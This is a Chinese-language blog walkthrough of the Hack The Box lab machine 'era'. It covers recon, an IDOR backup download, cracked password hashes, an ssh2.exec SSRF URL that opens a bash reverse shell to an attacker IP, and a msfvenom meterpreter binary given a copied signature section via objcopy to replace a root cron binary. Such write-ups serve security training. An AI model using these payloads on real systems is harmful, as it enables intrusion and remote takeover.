HTB赛季8靶场 - era

最新推荐文章于 2025-08-11 15:03:02 发布

瘾大侠

最新推荐文章于 2025-08-11 15:03:02 发布

阅读量1.1k

点赞数 6

CC 4.0 BY-SA版权

文章标签：安全 web安全网络安全

本文链接：https://blog.csdn.net/weixin_44368093/article/details/149722315

在这里插入图片描述

nmap扫描

└─$ nmap -p- --min-rate 1000 -T4 10.129.137.201 -oA nmapfullscan                                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-27 21:19 EDT
Warning: 10.129.137.201 giving up on port because retransmission cap hit (6).
Stats: 0:00:41 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 30.47% done; ETC: 21:21 (0:01:13 remaining)
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Stats: 0:01:08 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 50.06% done; ETC: 21:21 (0:00:58 remaining)
Nmap scan report for 10.129.137.201
Host is up (0.43s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 157.41 seconds

ffuf扫描vhost

ffuf -w /home/kali/Desktop/Info/SecLists-master/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://era.htb/ -H 'Host: FUZZ.era.htb'

![[Pasted image 20250728101147.png]]

![[Pasted image 20250728101240.png]]

dirsearch扫描页面

dirsearch -u http://file.era.htb/

![[Pasted image 20250728102347.png]]

注册账号并登录
![[Pasted image 20250728102402.png]]

IDOR窃取备份

http://file.era.htb/download.php?id=54&dl=true
http://file.era.htb/download.php?id=150&dl=true

![[Pasted image 20250728102941.png]]

我们爬取sqlite3DB文件
![[Pasted image 20250728141506.png]]

离线破解密码

$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm:america
$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.:mustang

我们用备份数据库里面的内容无法成功登陆，故修改问题答案
![[Pasted image 20250728155554.png]]

SSH2 + SSRF = RCE

登录admin_ef01cab31aa
![[Pasted image 20250728155620.png]]

我们分析源码可知fopen处存在漏洞，只要我们是管理员账户，我们便可以成功控制fopen函数。
![[Pasted image 20250728161833.png]]

![[Pasted image 20250728161933.png]]

那么我们可以尝试使用账号密码来执行一下命令了。

http://file.era.htb/download.php?id=6785&show=true&format=ssh2.exec://eric:america@127.0.0.1:22/bash+-i+>%26+/dev/tcp/10.10.16.3/9001+0>%261;

![[Pasted image 20250728162004.png]]
![[Pasted image 20250728162017.png]]

objcopy sh文件自检绕过

上linpeas.sh搜查
![[Pasted image 20250728163723.png]]

上pspy64监控定时任务
![[Pasted image 20250728164135.png]]

我们且对monitor文件可写，我们生成shell

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.16.3 LPORT=9001 -f elf -o reverse.elf

传输到受害机器，然后我们提取monitor的特征码（因为直接替换貌似不执行monitor，怀疑存在检测）

#提取monitor的特征码
objcopy --dump-section .text_sig=sig monitor

#添加monitor的特征码到恶意文件
objcopy --add-section .text_sig=sig reverse.elf

开启msf监听，然后复制bypass后的恶意文件到monitor

cp reverse.elf monitor

最终我们会获取一个shell
![[Pasted image 20250728174208.png]]